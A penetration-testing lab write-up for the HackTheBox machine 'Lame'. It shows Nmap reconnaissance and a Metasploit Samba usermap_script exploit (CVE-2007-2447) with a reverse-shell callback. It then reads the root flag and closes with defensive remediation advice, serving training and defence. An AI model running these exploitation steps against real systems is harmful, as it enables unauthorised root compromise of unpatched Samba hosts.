Objective
Practice a clean penetration-testing workflow on a known vulnerable machine: enumerate exposed services, avoid rabbit holes, validate the exploitable path, and document why the compromise happened.
Environment
- Target: HackTheBox Lame
- Attacker host: Kali Linux
- Primary tools: Nmap, Metasploit, service-version research
- Learning goal: Connect version enumeration to exploit validation and defensive remediation
Reconnaissance
Initial Nmap scan revealed a Linux host with limited open ports.
nmap -sC -sV -p- 10.10.10.3Open ports:
- 21/tcp — vsftpd 2.3.4
- 22/tcp — OpenSSH 4.7p1
- 139/445/tcp — Samba 3.0.20
Vulnerability Research
The vsftpd version had a known backdoor (CVE-2011-2523), but it was patched on this target. Shifted focus to Samba.
Samba 3.0.20 is vulnerable to CVE-2007-2447 — username map script command execution.
Exploitation
Used Metasploit's exploit/multi/samba/usermap_script module:
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOST 10.10.10.3
set LHOST tun0
runShell obtained as root immediately — no privilege escalation needed.
Post Exploitation
whoami
# root
cat /root/root.txt
# <root flag>Evidence Summary
| Evidence | Finding | Analyst Note |
|---|---|---|
| Port scan | SMB exposed on 139/445 | High-priority service to enumerate |
| Version | Samba 3.0.20 | Known vulnerable service version |
| CVE | CVE-2007-2447 | Username map script RCE path |
| Access | Root shell | No local privilege escalation required |
Defensive Takeaway
The fix is not only patching Samba. The defensive lesson is to maintain service inventory, flag obsolete versions, restrict SMB exposure, and monitor authentication or unexpected command execution around legacy file-sharing services.
Key Takeaways
- Always check Samba versions — 3.x has several critical RCE vulnerabilities
- CVE-2007-2447 gives instant root on unpatched systems
- Check for patched backdoors — vsftpd 2.3.4 is famous but often mitigated